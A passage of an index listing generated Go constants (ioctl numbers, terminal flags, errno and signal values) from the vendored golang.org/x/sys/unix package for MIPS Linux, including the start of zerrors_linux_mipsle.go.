SO_TIMESTAMPNS_OLD = 0x23 constant SO_TIMESTAMP_NEW (line 368) | SO_TIMESTAMP_NEW = 0x3f constant SO_TXREHASH (line 369) | SO_TXREHASH = 0x4a constant SO_TXTIME (line 370) | SO_TXTIME = 0x3d constant SO_TYPE (line 371) | SO_TYPE = 0x1008 constant SO_WIFI_STATUS (line 372) | SO_WIFI_STATUS = 0x29 constant SO_ZEROCOPY (line 373) | SO_ZEROCOPY = 0x3c constant TAB1 (line 374) | TAB1 = 0x800 constant TAB2 (line 375) | TAB2 = 0x1000 constant TAB3 (line 376) | TAB3 = 0x1800 constant TABDLY (line 377) | TABDLY = 0x1800 constant TCFLSH (line 378) | TCFLSH = 0x5407 constant TCGETA (line 379) | TCGETA = 0x5401 constant TCGETS (line 380) | TCGETS = 0x540d constant TCGETS2 (line 381) | TCGETS2 = 0x4030542a constant TCSAFLUSH (line 382) | TCSAFLUSH = 0x5410 constant TCSBRK (line 383) | TCSBRK = 0x5405 constant TCSBRKP (line 384) | TCSBRKP = 0x5486 constant TCSETA (line 385) | TCSETA = 0x5402 constant TCSETAF (line 386) | TCSETAF = 0x5404 constant TCSETAW (line 387) | TCSETAW = 0x5403 constant TCSETS (line 388) | TCSETS = 0x540e constant TCSETS2 (line 389) | TCSETS2 = 0x8030542b constant TCSETSF (line 390) | TCSETSF = 0x5410 constant TCSETSF2 (line 391) | TCSETSF2 = 0x8030542d constant TCSETSW (line 392) | TCSETSW = 0x540f constant TCSETSW2 (line 393) | TCSETSW2 = 0x8030542c constant TCXONC (line 394) | TCXONC = 0x5406 constant TFD_CLOEXEC (line 395) | TFD_CLOEXEC = 0x80000 constant TFD_NONBLOCK (line 396) | TFD_NONBLOCK = 0x80 constant TIOCCBRK (line 397) | TIOCCBRK = 0x5428 constant TIOCCONS (line 398) | TIOCCONS = 0x80047478 constant TIOCEXCL (line 399) | TIOCEXCL = 0x740d constant TIOCGDEV (line 400) | TIOCGDEV = 0x40045432 constant TIOCGETD (line 401) | TIOCGETD = 0x7400 constant TIOCGETP (line 402) | TIOCGETP = 0x7408 constant TIOCGEXCL (line 403) | TIOCGEXCL = 0x40045440 constant TIOCGICOUNT (line 404) | TIOCGICOUNT = 0x5492 constant TIOCGISO7816 (line 405) | TIOCGISO7816 = 0x40285442 constant TIOCGLCKTRMIOS (line 406) | TIOCGLCKTRMIOS = 0x548b constant TIOCGLTC (line 407) | TIOCGLTC = 0x7474 constant TIOCGPGRP (line 408) | TIOCGPGRP = 0x40047477 constant TIOCGPKT (line 409) | TIOCGPKT = 0x40045438 constant TIOCGPTLCK (line 410) | TIOCGPTLCK = 0x40045439 constant TIOCGPTN (line 411) | TIOCGPTN = 0x40045430 constant TIOCGPTPEER (line 412) | TIOCGPTPEER = 0x20005441 constant TIOCGRS485 (line 413) | TIOCGRS485 = 0x4020542e constant TIOCGSERIAL (line 414) | TIOCGSERIAL = 0x5484 constant TIOCGSID (line 415) | TIOCGSID = 0x7416 constant TIOCGSOFTCAR (line 416) | TIOCGSOFTCAR = 0x5481 constant TIOCGWINSZ (line 417) | TIOCGWINSZ = 0x40087468 constant TIOCINQ (line 418) | TIOCINQ = 0x467f constant TIOCLINUX (line 419) | TIOCLINUX = 0x5483 constant TIOCMBIC (line 420) | TIOCMBIC = 0x741c constant TIOCMBIS (line 421) | TIOCMBIS = 0x741b constant TIOCMGET (line 422) | TIOCMGET = 0x741d constant TIOCMIWAIT (line 423) | TIOCMIWAIT = 0x5491 constant TIOCMSET (line 424) | TIOCMSET = 0x741a constant TIOCM_CAR (line 425) | TIOCM_CAR = 0x100 constant TIOCM_CD (line 426) | TIOCM_CD = 0x100 constant TIOCM_CTS (line 427) | TIOCM_CTS = 0x40 constant TIOCM_DSR (line 428) | TIOCM_DSR = 0x400 constant TIOCM_RI (line 429) | TIOCM_RI = 0x200 constant TIOCM_RNG (line 430) | TIOCM_RNG = 0x200 constant TIOCM_SR (line 431) | TIOCM_SR = 0x20 constant TIOCM_ST (line 432) | TIOCM_ST = 0x10 constant TIOCNOTTY (line 433) | TIOCNOTTY = 0x5471 constant TIOCNXCL (line 434) | TIOCNXCL = 0x740e constant TIOCOUTQ (line 435) | TIOCOUTQ = 0x7472 constant TIOCPKT (line 436) | TIOCPKT = 0x5470 constant TIOCSBRK (line 437) | TIOCSBRK = 0x5427 constant TIOCSCTTY (line 438) | TIOCSCTTY = 0x5480 constant TIOCSERCONFIG (line 439) | TIOCSERCONFIG = 0x5488 constant TIOCSERGETLSR (line 440) | TIOCSERGETLSR = 0x548e constant TIOCSERGETMULTI (line 441) | TIOCSERGETMULTI = 0x548f constant TIOCSERGSTRUCT (line 442) | TIOCSERGSTRUCT = 0x548d constant TIOCSERGWILD (line 443) | TIOCSERGWILD = 0x5489 constant TIOCSERSETMULTI (line 444) | TIOCSERSETMULTI = 0x5490 constant TIOCSERSWILD (line 445) | TIOCSERSWILD = 0x548a constant TIOCSER_TEMT (line 446) | TIOCSER_TEMT = 0x1 constant TIOCSETD (line 447) | TIOCSETD = 0x7401 constant TIOCSETN (line 448) | TIOCSETN = 0x740a constant TIOCSETP (line 449) | TIOCSETP = 0x7409 constant TIOCSIG (line 450) | TIOCSIG = 0x80045436 constant TIOCSISO7816 (line 451) | TIOCSISO7816 = 0xc0285443 constant TIOCSLCKTRMIOS (line 452) | TIOCSLCKTRMIOS = 0x548c constant TIOCSLTC (line 453) | TIOCSLTC = 0x7475 constant TIOCSPGRP (line 454) | TIOCSPGRP = 0x80047476 constant TIOCSPTLCK (line 455) | TIOCSPTLCK = 0x80045431 constant TIOCSRS485 (line 456) | TIOCSRS485 = 0xc020542f constant TIOCSSERIAL (line 457) | TIOCSSERIAL = 0x5485 constant TIOCSSOFTCAR (line 458) | TIOCSSOFTCAR = 0x5482 constant TIOCSTI (line 459) | TIOCSTI = 0x5472 constant TIOCSWINSZ (line 460) | TIOCSWINSZ = 0x80087467 constant TIOCVHANGUP (line 461) | TIOCVHANGUP = 0x5437 constant TOSTOP (line 462) | TOSTOP = 0x8000 constant TUNATTACHFILTER (line 463) | TUNATTACHFILTER = 0x801054d5 constant TUNDETACHFILTER (line 464) | TUNDETACHFILTER = 0x801054d6 constant TUNGETDEVNETNS (line 465) | TUNGETDEVNETNS = 0x200054e3 constant TUNGETFEATURES (line 466) | TUNGETFEATURES = 0x400454cf constant TUNGETFILTER (line 467) | TUNGETFILTER = 0x401054db constant TUNGETIFF (line 468) | TUNGETIFF = 0x400454d2 constant TUNGETSNDBUF (line 469) | TUNGETSNDBUF = 0x400454d3 constant TUNGETVNETBE (line 470) | TUNGETVNETBE = 0x400454df constant TUNGETVNETHDRSZ (line 471) | TUNGETVNETHDRSZ = 0x400454d7 constant TUNGETVNETLE (line 472) | TUNGETVNETLE = 0x400454dd constant TUNSETCARRIER (line 473) | TUNSETCARRIER = 0x800454e2 constant TUNSETDEBUG (line 474) | TUNSETDEBUG = 0x800454c9 constant TUNSETFILTEREBPF (line 475) | TUNSETFILTEREBPF = 0x400454e1 constant TUNSETGROUP (line 476) | TUNSETGROUP = 0x800454ce constant TUNSETIFF (line 477) | TUNSETIFF = 0x800454ca constant TUNSETIFINDEX (line 478) | TUNSETIFINDEX = 0x800454da constant TUNSETLINK (line 479) | TUNSETLINK = 0x800454cd constant TUNSETNOCSUM (line 480) | TUNSETNOCSUM = 0x800454c8 constant TUNSETOFFLOAD (line 481) | TUNSETOFFLOAD = 0x800454d0 constant TUNSETOWNER (line 482) | TUNSETOWNER = 0x800454cc constant TUNSETPERSIST (line 483) | TUNSETPERSIST = 0x800454cb constant TUNSETQUEUE (line 484) | TUNSETQUEUE = 0x800454d9 constant TUNSETSNDBUF (line 485) | TUNSETSNDBUF = 0x800454d4 constant TUNSETSTEERINGEBPF (line 486) | TUNSETSTEERINGEBPF = 0x400454e0 constant TUNSETTXFILTER (line 487) | TUNSETTXFILTER = 0x800454d1 constant TUNSETVNETBE (line 488) | TUNSETVNETBE = 0x800454de constant TUNSETVNETHDRSZ (line 489) | TUNSETVNETHDRSZ = 0x800454d8 constant TUNSETVNETLE (line 490) | TUNSETVNETLE = 0x800454dc constant UBI_IOCATT (line 491) | UBI_IOCATT = 0x80186f40 constant UBI_IOCDET (line 492) | UBI_IOCDET = 0x80046f41 constant UBI_IOCEBCH (line 493) | UBI_IOCEBCH = 0x80044f02 constant UBI_IOCEBER (line 494) | UBI_IOCEBER = 0x80044f01 constant UBI_IOCEBISMAP (line 495) | UBI_IOCEBISMAP = 0x40044f05 constant UBI_IOCEBMAP (line 496) | UBI_IOCEBMAP = 0x80084f03 constant UBI_IOCEBUNMAP (line 497) | UBI_IOCEBUNMAP = 0x80044f04 constant UBI_IOCMKVOL (line 498) | UBI_IOCMKVOL = 0x80986f00 constant UBI_IOCRMVOL (line 499) | UBI_IOCRMVOL = 0x80046f01 constant UBI_IOCRNVOL (line 500) | UBI_IOCRNVOL = 0x91106f03 constant UBI_IOCRPEB (line 501) | UBI_IOCRPEB = 0x80046f04 constant UBI_IOCRSVOL (line 502) | UBI_IOCRSVOL = 0x800c6f02 constant UBI_IOCSETVOLPROP (line 503) | UBI_IOCSETVOLPROP = 0x80104f06 constant UBI_IOCSPEB (line 504) | UBI_IOCSPEB = 0x80046f05 constant UBI_IOCVOLCRBLK (line 505) | UBI_IOCVOLCRBLK = 0x80804f07 constant UBI_IOCVOLRMBLK (line 506) | UBI_IOCVOLRMBLK = 0x20004f08 constant UBI_IOCVOLUP (line 507) | UBI_IOCVOLUP = 0x80084f00 constant VDISCARD (line 508) | VDISCARD = 0xd constant VEOF (line 509) | VEOF = 0x10 constant VEOL (line 510) | VEOL = 0x11 constant VEOL2 (line 511) | VEOL2 = 0x6 constant VMIN (line 512) | VMIN = 0x4 constant VREPRINT (line 513) | VREPRINT = 0xc constant VSTART (line 514) | VSTART = 0x8 constant VSTOP (line 515) | VSTOP = 0x9 constant VSUSP (line 516) | VSUSP = 0xa constant VSWTC (line 517) | VSWTC = 0x7 constant VSWTCH (line 518) | VSWTCH = 0x7 constant VT1 (line 519) | VT1 = 0x4000 constant VTDLY (line 520) | VTDLY = 0x4000 constant VTIME (line 521) | VTIME = 0x5 constant VWERASE (line 522) | VWERASE = 0xe constant WDIOC_GETBOOTSTATUS (line 523) | WDIOC_GETBOOTSTATUS = 0x40045702 constant WDIOC_GETPRETIMEOUT (line 524) | WDIOC_GETPRETIMEOUT = 0x40045709 constant WDIOC_GETSTATUS (line 525) | WDIOC_GETSTATUS = 0x40045701 constant WDIOC_GETSUPPORT (line 526) | WDIOC_GETSUPPORT = 0x40285700 constant WDIOC_GETTEMP (line 527) | WDIOC_GETTEMP = 0x40045703 constant WDIOC_GETTIMELEFT (line 528) | WDIOC_GETTIMELEFT = 0x4004570a constant WDIOC_GETTIMEOUT (line 529) | WDIOC_GETTIMEOUT = 0x40045707 constant WDIOC_KEEPALIVE (line 530) | WDIOC_KEEPALIVE = 0x40045705 constant WDIOC_SETOPTIONS (line 531) | WDIOC_SETOPTIONS = 0x40045704 constant WORDSIZE (line 532) | WORDSIZE = 0x40 constant XCASE (line 533) | XCASE = 0x4 constant XTABS (line 534) | XTABS = 0x1800 constant _HIDIOCGRAWNAME (line 535) | _HIDIOCGRAWNAME = 0x40804804 constant _HIDIOCGRAWPHYS (line 536) | _HIDIOCGRAWPHYS = 0x40404805 constant _HIDIOCGRAWUNIQ (line 537) | _HIDIOCGRAWUNIQ = 0x40404808 constant EADDRINUSE (line 542) | EADDRINUSE = syscall.Errno(0x7d) constant EADDRNOTAVAIL (line 543) | EADDRNOTAVAIL = syscall.Errno(0x7e) constant EADV (line 544) | EADV = syscall.Errno(0x44) constant EAFNOSUPPORT (line 545) | EAFNOSUPPORT = syscall.Errno(0x7c) constant EALREADY (line 546) | EALREADY = syscall.Errno(0x95) constant EBADE (line 547) | EBADE = syscall.Errno(0x32) constant EBADFD (line 548) | EBADFD = syscall.Errno(0x51) constant EBADMSG (line 549) | EBADMSG = syscall.Errno(0x4d) constant EBADR (line 550) | EBADR = syscall.Errno(0x33) constant EBADRQC (line 551) | EBADRQC = syscall.Errno(0x36) constant EBADSLT (line 552) | EBADSLT = syscall.Errno(0x37) constant EBFONT (line 553) | EBFONT = syscall.Errno(0x3b) constant ECANCELED (line 554) | ECANCELED = syscall.Errno(0x9e) constant ECHRNG (line 555) | ECHRNG = syscall.Errno(0x25) constant ECOMM (line 556) | ECOMM = syscall.Errno(0x46) constant ECONNABORTED (line 557) | ECONNABORTED = syscall.Errno(0x82) constant ECONNREFUSED (line 558) | ECONNREFUSED = syscall.Errno(0x92) constant ECONNRESET (line 559) | ECONNRESET = syscall.Errno(0x83) constant EDEADLK (line 560) | EDEADLK = syscall.Errno(0x2d) constant EDEADLOCK (line 561) | EDEADLOCK = syscall.Errno(0x38) constant EDESTADDRREQ (line 562) | EDESTADDRREQ = syscall.Errno(0x60) constant EDOTDOT (line 563) | EDOTDOT = syscall.Errno(0x49) constant EDQUOT (line 564) | EDQUOT = syscall.Errno(0x46d) constant EHOSTDOWN (line 565) | EHOSTDOWN = syscall.Errno(0x93) constant EHOSTUNREACH (line 566) | EHOSTUNREACH = syscall.Errno(0x94) constant EHWPOISON (line 567) | EHWPOISON = syscall.Errno(0xa8) constant EIDRM (line 568) | EIDRM = syscall.Errno(0x24) constant EILSEQ (line 569) | EILSEQ = syscall.Errno(0x58) constant EINIT (line 570) | EINIT = syscall.Errno(0x8d) constant EINPROGRESS (line 571) | EINPROGRESS = syscall.Errno(0x96) constant EISCONN (line 572) | EISCONN = syscall.Errno(0x85) constant EISNAM (line 573) | EISNAM = syscall.Errno(0x8b) constant EKEYEXPIRED (line 574) | EKEYEXPIRED = syscall.Errno(0xa2) constant EKEYREJECTED (line 575) | EKEYREJECTED = syscall.Errno(0xa4) constant EKEYREVOKED (line 576) | EKEYREVOKED = syscall.Errno(0xa3) constant EL2HLT (line 577) | EL2HLT = syscall.Errno(0x2c) constant EL2NSYNC (line 578) | EL2NSYNC = syscall.Errno(0x26) constant EL3HLT (line 579) | EL3HLT = syscall.Errno(0x27) constant EL3RST (line 580) | EL3RST = syscall.Errno(0x28) constant ELIBACC (line 581) | ELIBACC = syscall.Errno(0x53) constant ELIBBAD (line 582) | ELIBBAD = syscall.Errno(0x54) constant ELIBEXEC (line 583) | ELIBEXEC = syscall.Errno(0x57) constant ELIBMAX (line 584) | ELIBMAX = syscall.Errno(0x56) constant ELIBSCN (line 585) | ELIBSCN = syscall.Errno(0x55) constant ELNRNG (line 586) | ELNRNG = syscall.Errno(0x29) constant ELOOP (line 587) | ELOOP = syscall.Errno(0x5a) constant EMEDIUMTYPE (line 588) | EMEDIUMTYPE = syscall.Errno(0xa0) constant EMSGSIZE (line 589) | EMSGSIZE = syscall.Errno(0x61) constant EMULTIHOP (line 590) | EMULTIHOP = syscall.Errno(0x4a) constant ENAMETOOLONG (line 591) | ENAMETOOLONG = syscall.Errno(0x4e) constant ENAVAIL (line 592) | ENAVAIL = syscall.Errno(0x8a) constant ENETDOWN (line 593) | ENETDOWN = syscall.Errno(0x7f) constant ENETRESET (line 594) | ENETRESET = syscall.Errno(0x81) constant ENETUNREACH (line 595) | ENETUNREACH = syscall.Errno(0x80) constant ENOANO (line 596) | ENOANO = syscall.Errno(0x35) constant ENOBUFS (line 597) | ENOBUFS = syscall.Errno(0x84) constant ENOCSI (line 598) | ENOCSI = syscall.Errno(0x2b) constant ENODATA (line 599) | ENODATA = syscall.Errno(0x3d) constant ENOKEY (line 600) | ENOKEY = syscall.Errno(0xa1) constant ENOLCK (line 601) | ENOLCK = syscall.Errno(0x2e) constant ENOLINK (line 602) | ENOLINK = syscall.Errno(0x43) constant ENOMEDIUM (line 603) | ENOMEDIUM = syscall.Errno(0x9f) constant ENOMSG (line 604) | ENOMSG = syscall.Errno(0x23) constant ENONET (line 605) | ENONET = syscall.Errno(0x40) constant ENOPKG (line 606) | ENOPKG = syscall.Errno(0x41) constant ENOPROTOOPT (line 607) | ENOPROTOOPT = syscall.Errno(0x63) constant ENOSR (line 608) | ENOSR = syscall.Errno(0x3f) constant ENOSTR (line 609) | ENOSTR = syscall.Errno(0x3c) constant ENOSYS (line 610) | ENOSYS = syscall.Errno(0x59) constant ENOTCONN (line 611) | ENOTCONN = syscall.Errno(0x86) constant ENOTEMPTY (line 612) | ENOTEMPTY = syscall.Errno(0x5d) constant ENOTNAM (line 613) | ENOTNAM = syscall.Errno(0x89) constant ENOTRECOVERABLE (line 614) | ENOTRECOVERABLE = syscall.Errno(0xa6) constant ENOTSOCK (line 615) | ENOTSOCK = syscall.Errno(0x5f) constant ENOTSUP (line 616) | ENOTSUP = syscall.Errno(0x7a) constant ENOTUNIQ (line 617) | ENOTUNIQ = syscall.Errno(0x50) constant EOPNOTSUPP (line 618) | EOPNOTSUPP = syscall.Errno(0x7a) constant EOVERFLOW (line 619) | EOVERFLOW = syscall.Errno(0x4f) constant EOWNERDEAD (line 620) | EOWNERDEAD = syscall.Errno(0xa5) constant EPFNOSUPPORT (line 621) | EPFNOSUPPORT = syscall.Errno(0x7b) constant EPROTO (line 622) | EPROTO = syscall.Errno(0x47) constant EPROTONOSUPPORT (line 623) | EPROTONOSUPPORT = syscall.Errno(0x78) constant EPROTOTYPE (line 624) | EPROTOTYPE = syscall.Errno(0x62) constant EREMCHG (line 625) | EREMCHG = syscall.Errno(0x52) constant EREMDEV (line 626) | EREMDEV = syscall.Errno(0x8e) constant EREMOTE (line 627) | EREMOTE = syscall.Errno(0x42) constant EREMOTEIO (line 628) | EREMOTEIO = syscall.Errno(0x8c) constant ERESTART (line 629) | ERESTART = syscall.Errno(0x5b) constant ERFKILL (line 630) | ERFKILL = syscall.Errno(0xa7) constant ESHUTDOWN (line 631) | ESHUTDOWN = syscall.Errno(0x8f) constant ESOCKTNOSUPPORT (line 632) | ESOCKTNOSUPPORT = syscall.Errno(0x79) constant ESRMNT (line 633) | ESRMNT = syscall.Errno(0x45) constant ESTALE (line 634) | ESTALE = syscall.Errno(0x97) constant ESTRPIPE (line 635) | ESTRPIPE = syscall.Errno(0x5c) constant ETIME (line 636) | ETIME = syscall.Errno(0x3e) constant ETIMEDOUT (line 637) | ETIMEDOUT = syscall.Errno(0x91) constant ETOOMANYREFS (line 638) | ETOOMANYREFS = syscall.Errno(0x90) constant EUCLEAN (line 639) | EUCLEAN = syscall.Errno(0x87) constant EUNATCH (line 640) | EUNATCH = syscall.Errno(0x2a) constant EUSERS (line 641) | EUSERS = syscall.Errno(0x5e) constant EXFULL (line 642) | EXFULL = syscall.Errno(0x34) constant SIGBUS (line 647) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 648) | SIGCHLD = syscall.Signal(0x12) constant SIGCLD (line 649) | SIGCLD = syscall.Signal(0x12) constant SIGCONT (line 650) | SIGCONT = syscall.Signal(0x19) constant SIGEMT (line 651) | SIGEMT = syscall.Signal(0x7) constant SIGIO (line 652) | SIGIO = syscall.Signal(0x16) constant SIGPOLL (line 653) | SIGPOLL = syscall.Signal(0x16) constant SIGPROF (line 654) | SIGPROF = syscall.Signal(0x1d) constant SIGPWR (line 655) | SIGPWR = syscall.Signal(0x13) constant SIGSTOP (line 656) | SIGSTOP = syscall.Signal(0x17) constant SIGSYS (line 657) | SIGSYS = syscall.Signal(0xc) constant SIGTSTP (line 658) | SIGTSTP = syscall.Signal(0x18) constant SIGTTIN (line 659) | SIGTTIN = syscall.Signal(0x1a) constant SIGTTOU (line 660) | SIGTTOU = syscall.Signal(0x1b) constant SIGURG (line 661) | SIGURG = syscall.Signal(0x15) constant SIGUSR1 (line 662) | SIGUSR1 = syscall.Signal(0x10) constant SIGUSR2 (line 663) | SIGUSR2 = syscall.Signal(0x11) constant SIGVTALRM (line 664) | SIGVTALRM = syscall.Signal(0x1c) constant SIGWINCH (line 665) | SIGWINCH = syscall.Signal(0x14) constant SIGXCPU (line 666) | SIGXCPU = syscall.Signal(0x1e) constant SIGXFSZ (line 667) | SIGXFSZ = syscall.Signal(0x1f) FILE: vendor/golang.org/x/sys/unix/zerrors_linux_mipsle.go constant B1000000 (line 14) | B1000000 = 0x1008 constant B115200 (line 15) | B115200 = 0x1002 constant B1152000 (line 16) | B1152000 = 0x1009 constant B1500000 (line 17) | B1500000 = 0x100a constant B2000000 (line 18) | B2000000 = 0x100b constant B230400 (line 19) | B230400 = 0x1003 constant B2500000 (line 20) | B2500000 = 0x100c constant B3000000 (line 21) | B3000000 = 0x100d constant B3500000 (line 22) | B3500000 = 0x100e constant B4000000 (line 23) | B4000000 = 0x100f constant B460800 (line 24) | B460800 = 0x1004 constant B500000 (line 25) | B500000 = 0x1005 constant B57600 (line 26) | B57600 = 0x1001 constant B576000 (line 27) | B576000 = 0x1006 constant B921600 (line 28) | B921600 = 0x1007 constant BLKALIGNOFF (line 29) | BLKALIGNOFF = 0x2000127a constant BLKBSZGET (line 30) | BLKBSZGET = 0x40041270 constant BLKBSZSET (line 31) | BLKBSZSET = 0x80041271 constant BLKDISCARD (line 32) | BLKDISCARD = 0x20001277 constant BLKDISCARDZEROES (line 33) | BLKDISCARDZEROES = 0x2000127c constant BLKFLSBUF (line 34) | BLKFLSBUF = 0x20001261 constant BLKFRAGET (line 35) | BLKFRAGET = 0x20001265 constant BLKFRASET (line 36) | BLKFRASET = 0x20001264 constant BLKGETDISKSEQ (line 37) | BLKGETDISKSEQ = 0x40081280 constant BLKGETSIZE (line 38) | BLKGETSIZE = 0x20001260 constant BLKGETSIZE64 (line 39) | BLKGETSIZE64 = 0x40041272 constant BLKIOMIN (line 40) | BLKIOMIN = 0x20001278 constant BLKIOOPT (line 41) | BLKIOOPT = 0x20001279 constant BLKPBSZGET (line 42) | BLKPBSZGET = 0x2000127b constant BLKRAGET (line 43) | BLKRAGET = 0x20001263 constant BLKRASET (line 44) | BLKRASET = 0x20001262 constant BLKROGET (line 45) | BLKROGET = 0x2000125e constant BLKROSET (line 46) | BLKROSET = 0x2000125d constant BLKROTATIONAL (line 47) | BLKROTATIONAL = 0x2000127e constant BLKRRPART (line 48) | BLKRRPART = 0x2000125f constant BLKSECDISCARD (line 49) | BLKSECDISCARD = 0x2000127d constant BLKSECTGET (line 50) | BLKSECTGET = 0x20001267 constant BLKSECTSET (line 51) | BLKSECTSET = 0x20001266 constant BLKSSZGET (line 52) | BLKSSZGET = 0x20001268 constant BLKZEROOUT (line 53) | BLKZEROOUT = 0x2000127f constant BOTHER (line 54) | BOTHER = 0x1000 constant BS1 (line 55) | BS1 = 0x2000 constant BSDLY (line 56) | BSDLY = 0x2000 constant CBAUD (line 57) | CBAUD = 0x100f constant CBAUDEX (line 58) | CBAUDEX = 0x1000 constant CIBAUD (line 59) | CIBAUD = 0x100f0000 constant CLOCAL (line 60) | CLOCAL = 0x800 constant CR1 (line 61) | CR1 = 0x200 constant CR2 (line 62) | CR2 = 0x400 constant CR3 (line 63) | CR3 = 0x600 constant CRDLY (line 64) | CRDLY = 0x600 constant CREAD (line 65) | CREAD = 0x80 constant CS6 (line 66) | CS6 = 0x10 constant CS7 (line 67) | CS7 = 0x20 constant CS8 (line 68) | CS8 = 0x30 constant CSIZE (line 69) | CSIZE = 0x30 constant CSTOPB (line 70) | CSTOPB = 0x40 constant ECCGETLAYOUT (line 71) | ECCGETLAYOUT = 0x41484d11 constant ECCGETSTATS (line 72) | ECCGETSTATS = 0x40104d12 constant ECHOCTL (line 73) | ECHOCTL = 0x200 constant ECHOE (line 74) | ECHOE = 0x10 constant ECHOK (line 75) | ECHOK = 0x20 constant ECHOKE (line 76) | ECHOKE = 0x800 constant ECHONL (line 77) | ECHONL = 0x40 constant ECHOPRT (line 78) | ECHOPRT = 0x400 constant EFD_CLOEXEC (line 79) | EFD_CLOEXEC = 0x80000 constant EFD_NONBLOCK (line 80) | EFD_NONBLOCK = 0x80 constant EPOLL_CLOEXEC (line 81) | EPOLL_CLOEXEC = 0x80000 constant EXTPROC (line 82) | EXTPROC = 0x10000 constant FF1 (line 83) | FF1 = 0x8000 constant FFDLY (line 84) | FFDLY = 0x8000 constant FICLONE (line 85) | FICLONE = 0x80049409 constant FICLONERANGE (line 86) | FICLONERANGE = 0x8020940d constant FLUSHO (line 87) | FLUSHO = 0x2000 constant FS_IOC_ENABLE_VERITY (line 88) | FS_IOC_ENABLE_VERITY = 0x80806685 constant FS_IOC_GETFLAGS (line 89) | FS_IOC_GETFLAGS = 0x40046601 constant FS_IOC_GET_ENCRYPTION_NONCE (line 90) | FS_IOC_GET_ENCRYPTION_NONCE = 0x4010661b constant FS_IOC_GET_ENCRYPTION_POLICY (line 91) | FS_IOC_GET_ENCRYPTION_POLICY = 0x800c6615 constant FS_IOC_GET_ENCRYPTION_PWSALT (line 92) | FS_IOC_GET_ENCRYPTION_PWSALT = 0x80106614 constant FS_IOC_SETFLAGS (line 93) | FS_IOC_SETFLAGS = 0x80046602 constant FS_IOC_SET_ENCRYPTION_POLICY (line 94) | FS_IOC_SET_ENCRYPTION_POLICY = 0x400c6613 constant F_GETLK (line 95) | F_GETLK = 0x21 constant F_GETLK64 (line 96) | F_GETLK64 = 0x21 constant F_GETOWN (line 97) | F_GETOWN = 0x17 constant F_RDLCK (line 98) | F_RDLCK = 0x0 constant F_SETLK (line 99) | F_SETLK = 0x22 constant F_SETLK64 (line 100) | F_SETLK64 = 0x22 constant F_SETLKW (line 101) | F_SETLKW = 0x23 constant F_SETLKW64 (line 102) | F_SETLKW64 = 0x23 constant F_SETOWN (line 103) | F_SETOWN = 0x18 constant F_UNLCK (line 104) | F_UNLCK = 0x2 constant F_WRLCK (line 105) | F_WRLCK = 0x1 constant HIDIOCGRAWINFO (line 106) | HIDIOCGRAWINFO = 0x40084803 constant HIDIOCGRDESC (line 107) | HIDIOCGRDESC = 0x50044802 constant HIDIOCGRDESCSIZE (line 108) | HIDIOCGRDESCSIZE = 0x40044801 constant HUPCL (line 109) | HUPCL = 0x400 constant ICANON (line 110) | ICANON = 0x2 constant IEXTEN (line 111) | IEXTEN = 0x100 constant IN_CLOEXEC (line 112) | IN_CLOEXEC = 0x80000 constant IN_NONBLOCK (line 113) | IN_NONBLOCK = 0x80 constant IOCTL_VM_SOCKETS_GET_LOCAL_CID (line 114) | IOCTL_VM_SOCKETS_GET_LOCAL_CID = 0x200007b9 constant ISIG (line 115) | ISIG = 0x1 constant IUCLC (line 116) | IUCLC = 0x200 constant IXOFF (line 117) | IXOFF = 0x1000 constant IXON (line 118) | IXON = 0x400 constant MAP_ANON (line 119) | MAP_ANON = 0x800 constant MAP_ANONYMOUS (line 120) | MAP_ANONYMOUS = 0x800 constant MAP_DENYWRITE (line 121) | MAP_DENYWRITE = 0x2000 constant MAP_EXECUTABLE (line 122) | MAP_EXECUTABLE = 0x4000 constant MAP_GROWSDOWN (line 123) | MAP_GROWSDOWN = 0x1000 constant MAP_HUGETLB (line 124) | MAP_HUGETLB = 0x80000 constant MAP_LOCKED (line 125) | MAP_LOCKED = 0x8000 constant MAP_NONBLOCK (line 126) | MAP_NONBLOCK = 0x20000 constant MAP_NORESERVE (line 127) | MAP_NORESERVE = 0x400 constant MAP_POPULATE (line 128) | MAP_POPULATE = 0x10000 constant MAP_RENAME (line 129) | MAP_RENAME = 0x800 constant MAP_STACK (line 130) | MAP_STACK = 0x40000 constant MCL_CURRENT (line 131) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 132) | MCL_FUTURE = 0x2 constant MCL_ONFAULT (line 133) | MCL_ONFAULT = 0x4 constant MEMERASE (line 134) | MEMERASE = 0x80084d02 constant MEMERASE64 (line 135) | MEMERASE64 = 0x80104d14 constant MEMGETBADBLOCK (line 136) | MEMGETBADBLOCK = 0x80084d0b constant MEMGETINFO (line 137) | MEMGETINFO = 0x40204d01 constant MEMGETOOBSEL (line 138) | MEMGETOOBSEL = 0x40c84d0a constant MEMGETREGIONCOUNT (line 139) | MEMGETREGIONCOUNT = 0x40044d07 constant MEMISLOCKED (line 140) | MEMISLOCKED = 0x40084d17 constant MEMLOCK (line 141) | MEMLOCK = 0x80084d05 constant MEMREAD (line 142) | MEMREAD = 0xc0404d1a constant MEMREADOOB (line 143) | MEMREADOOB = 0xc00c4d04 constant MEMSETBADBLOCK (line 144) | MEMSETBADBLOCK = 0x80084d0c constant MEMUNLOCK (line 145) | MEMUNLOCK = 0x80084d06 constant MEMWRITEOOB (line 146) | MEMWRITEOOB = 0xc00c4d03 constant MTDFILEMODE (line 147) | MTDFILEMODE = 0x20004d13 constant NFDBITS (line 148) | NFDBITS = 0x20 constant NLDLY (line 149) | NLDLY = 0x100 constant NOFLSH (line 150) | NOFLSH = 0x80 constant NS_GET_NSTYPE (line 151) | NS_GET_NSTYPE = 0x2000b703 constant NS_GET_OWNER_UID (line 152) | NS_GET_OWNER_UID = 0x2000b704 constant NS_GET_PARENT (line 153) | NS_GET_PARENT = 0x2000b702 constant NS_GET_USERNS (line 154) | NS_GET_USERNS = 0x2000b701 constant OLCUC (line 155) | OLCUC = 0x2 constant ONLCR (line 156) | ONLCR = 0x4 constant OTPERASE (line 157) | OTPERASE = 0x800c4d19 constant OTPGETREGIONCOUNT (line 158) | OTPGETREGIONCOUNT = 0x80044d0e constant OTPGETREGIONINFO (line 159) | OTPGETREGIONINFO = 0x800c4d0f constant OTPLOCK (line 160) | OTPLOCK = 0x400c4d10 constant OTPSELECT (line 161) | OTPSELECT = 0x40044d0d constant O_APPEND (line 162) | O_APPEND = 0x8 constant O_ASYNC (line 163) | O_ASYNC = 0x1000 constant O_CLOEXEC (line 164) | O_CLOEXEC = 0x80000 constant O_CREAT (line 165) | O_CREAT = 0x100 constant O_DIRECT (line 166) | O_DIRECT = 0x8000 constant O_DIRECTORY (line 167) | 